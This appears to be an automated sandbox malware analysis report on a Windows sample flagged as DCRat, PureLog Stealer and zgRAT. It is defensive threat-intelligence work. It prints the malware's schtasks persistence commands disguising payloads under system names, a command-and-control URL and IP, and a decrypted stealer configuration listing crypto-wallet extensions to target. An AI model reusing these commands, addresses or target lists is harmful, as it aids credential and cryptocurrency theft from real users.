Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f3I38kv.exe

Overview

General Information

Sample name:f3I38kv.exe
Analysis ID:1582378
MD5:71e2bab6de31ab3476ac7529a603de1c
SHA1:ce92b47562732cb095b318f2e5cf0f5bf7fb4b68
SHA256:c4dda91a7666f799687ecc6998b0676dd19c4545b381271d01c0400274d18c55
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • f3I38kv.exe (PID: 7052 cmdline: "C:\Users\user\Desktop\f3I38kv.exe" MD5: 71E2BAB6DE31AB3476AC7529A603DE1C)
    • wscript.exe (PID: 7136 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockbrowserdllCommon\KvkJOplk2GTpcDyjoXWpi6SQDRLpKp2SGwZjihDz.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6280 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockbrowserdllCommon\ZUKrGOW39NDMa.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hyperruntimemonitorCommon.exe (PID: 1832 cmdline: "C:\blockbrowserdllCommon/hyperruntimemonitorCommon.exe" MD5: 798B5560B2A2C6596A0C1A09419AD2C4)
          • schtasks.exe (PID: 2088 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3004 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2144 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5900 cmdline: schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 10 /tr "'C:\Recovery\SIHClient.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6092 cmdline: schtasks.exe /create /tn "SIHClient" /sc ONLOGON /tr "'C:\Recovery\SIHClient.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3412 cmdline: schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SIHClient.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1228 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5252 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5668 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6504 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 10 /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7144 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7056 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 8 /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7160 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6472 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 932 cmdline: schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6372 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qVPGMYvCwM.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 6208 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 6260 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • nGnJvqnFLoRdIZNyVoMyF.exe (PID: 1880 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe" MD5: 798B5560B2A2C6596A0C1A09419AD2C4)
  • nGnJvqnFLoRdIZNyVoMyF.exe (PID: 6328 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe" MD5: 798B5560B2A2C6596A0C1A09419AD2C4)
  • nGnJvqnFLoRdIZNyVoMyF.exe (PID: 4228 cmdline: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe" MD5: 798B5560B2A2C6596A0C1A09419AD2C4)
  • cleanup
{"C2 url": "http://vds-898383.1gb.ru/pipePacketgamelocaldownloadsTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
f3I38kv.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    f3I38kv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\SIHClient.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1659074697.0000000005326000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000007.00000000.1936497024.0000000000A02000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.1658269779.0000000005214000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000007.00000002.1996199845.0000000013408000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: hyperruntimemonitorCommon.exe PID: 1832JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          SourceRuleDescriptionAuthorStrings
                          0.3.f3I38kv.exe.5262707.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.f3I38kv.exe.5262707.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.f3I38kv.exe.5374707.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.f3I38kv.exe.5374707.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  7.0.hyperruntimemonitorCommon.exe.a00000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    System Summary

                                    barindex
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, ProcessId: 1832, TargetFilename: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockbrowserdllCommon\KvkJOplk2GTpcDyjoXWpi6SQDRLpKp2SGwZjihDz.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockbrowserdllCommon\KvkJOplk2GTpcDyjoXWpi6SQDRLpKp2SGwZjihDz.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\f3I38kv.exe", ParentImage: C:\Users\user\Desktop\f3I38kv.exe, ParentProcessId: 7052, ParentProcessName: f3I38kv.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockbrowserdllCommon\KvkJOplk2GTpcDyjoXWpi6SQDRLpKp2SGwZjihDz.vbe" , ProcessId: 7136, ProcessName: wscript.exe

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /f, CommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\blockbrowserdllCommon/hyperruntimemonitorCommon.exe", ParentImage: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, ParentProcessId: 1832, ParentProcessName: hyperruntimemonitorCommon.exe, ProcessCommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /f, ProcessId: 1228, ProcessName: schtasks.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-30T13:18:38.084470+010020480951A Network Trojan was detected192.168.2.44973681.177.33.680TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: f3I38kv.exeAvira: detected
                                    Source: C:\Users\user\AppData\Local\Temp\qVPGMYvCwM.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\rfYGTcKI.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\ZLNiVXPn.logAvira: detection malicious, Label: TR/Agent.jbwuj
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\kikGqNQT.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\KpbTIyuS.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                                    Source: C:\Users\user\Desktop\DzXmKSai.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\omJXhfZJ.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Recovery\SIHClient.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\yEVVDmkp.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: 00000007.00000002.1996199845.0000000013408000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://vds-898383.1gb.ru/pipePacketgamelocaldownloadsTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: C:\Users\user\Desktop\DzXmKSai.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\JsALnyfX.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\PkdkPdkL.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\WahSOJEu.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\YTwAzGpt.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\ZLNiVXPn.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\cBDZcTPh.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\fDqHyDTc.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\kikGqNQT.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\nYbxxKQM.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\pixyxcvN.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\wKTFMmGz.logReversingLabs: Detection: 20%
                                    Source: f3I38kv.exeReversingLabs: Detection: 52%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                                    Source: C:\Users\user\Desktop\JsALnyfX.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\wTqFwYZw.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\uWPwaYLB.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\nYbxxKQM.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\rfYGTcKI.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\YTwAzGpt.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\kikGqNQT.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\KpbTIyuS.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\cBDZcTPh.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\omJXhfZJ.logJoe Sandbox ML: detected
                                    Source: C:\Recovery\SIHClient.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\hxFqjzFa.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\yEVVDmkp.logJoe Sandbox ML: detected
                                    Source: f3I38kv.exeJoe Sandbox ML: detected
                                    Source: 00000007.00000002.1996199845.0000000013408000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"a16c206c-6675-4a07-b8b3-f396ed5c6bae":{"_0":"","_1":"Block"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"One directory"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive","_1":""}}
                                    Source: 00000007.00000002.1996199845.0000000013408000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["4qKnNkrD0nd8G2gEcZdyULKAiXWu5YlbNxiRsEmOyvD23OSwZGj4LEJsfKE0O6IbCCuTTOVXxO9iHSGUFkVzyqPJo0wh9wA2nmz0d9cLuMH6EkkNDtunlTnWwkpdcyXA","36ee50d7d201ff2376332adc828fa2641c4dc216989787c8e03018bbdc024ca7","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
                                    Source: 00000007.00000002.1996199845.0000000013408000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://vds-898383.1gb.ru/","pipePacketgamelocaldownloadsTemporary"]]
                                    Source: f3I38kv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\de83736a915df6Jump to behavior
                                    Source: f3I38kv.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: f3I38kv.exe
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004FA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_004FA69B
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0050C220
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh7_2_00007FFD9BC7CFFD
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 4x nop then jmp 00007FFD9BAD1BE6h29_2_00007FFD9BAD19DE

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 81.177.33.6:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: hyperruntimemonitorCommon.exe, 00000007.00000002.1990215606.000000000341B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004F6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_004F6FAA
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exeJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\5940a34987c991Jump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004F848E0_2_004F848E
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004F40FE0_2_004F40FE
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_005040880_2_00504088
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_005000B70_2_005000B7
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_005071530_2_00507153
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_005151C90_2_005151C9
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_005062CA0_2_005062CA
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004F32F70_2_004F32F7
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_005043BF0_2_005043BF
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0051D4400_2_0051D440
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004FF4610_2_004FF461
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004FC4260_2_004FC426
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_005077EF0_2_005077EF
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004F286B0_2_004F286B
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0051D8EE0_2_0051D8EE
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_005219F40_2_005219F4
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004FE9B70_2_004FE9B7
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_00506CDC0_2_00506CDC
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_00503E0B0_2_00503E0B
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004FEFE20_2_004FEFE2
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_00514F9A0_2_00514F9A
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9BAC0DA37_2_00007FFD9BAC0DA3
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9BC705B37_2_00007FFD9BC705B3
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 26_2_00007FFD9BAD0DA326_2_00007FFD9BAD0DA3
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BADA5FA29_2_00007FFD9BADA5FA
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BACF15229_2_00007FFD9BACF152
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BAC0DA329_2_00007FFD9BAC0DA3
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BB09A8C29_2_00007FFD9BB09A8C
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BB1456229_2_00007FFD9BB14562
